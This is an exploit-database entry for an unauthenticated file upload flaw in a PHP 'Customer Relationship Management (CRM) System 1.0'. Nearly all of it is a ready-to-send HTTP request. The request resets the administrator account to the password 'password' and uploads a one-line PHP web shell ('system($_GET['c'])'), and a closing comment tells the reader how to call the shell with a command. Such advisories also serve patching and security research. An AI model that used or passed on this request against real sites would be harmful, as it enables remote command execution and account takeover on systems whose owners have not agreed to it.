id: 36232
date: 05/12/2021
title: Customer Relationship Management (CRM) System 1.0 Shell Upload Vulnerability
author: Richard Jones
cves: 

# Exploit Title: Customer Relationship Management (CRM) Unrestricted File Upload (unauthenticated)
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14794&title=Customer+Relationship+Management+%28CRM%29+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: # Tested on: windows 10 (build 19041) + xampp v3.2.4

POST /crm/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------73401159029622284642216073649
Content-Length: 852
Origin: http://localhost
Connection: close
Referer: http://localhost/crm/customer/?page=user


-----------------------------73401159029622284642216073649
Content-Disposition: form-data; name="id"

1
-----------------------------73401159029622284642216073649
Content-Disposition: form-data; name="firstname"

Adminstrator
-----------------------------73401159029622284642216073649
Content-Disposition: form-data; name="lastname"

Admin
-----------------------------73401159029622284642216073649
Content-Disposition: form-data; name="username"

admin
-----------------------------73401159029622284642216073649
Content-Disposition: form-data; name="password"

password
-----------------------------73401159029622284642216073649
Content-Disposition: form-data; name="img"; filename="friend.php"
Content-Type: application/octet-stream

<?php system($_GET['c']);?>
-----------------------------73401159029622284642216073649--




#Call shell at /crm/uploads/123123_friend.php?c=whoami

#  0day.today [2023-03-27]  #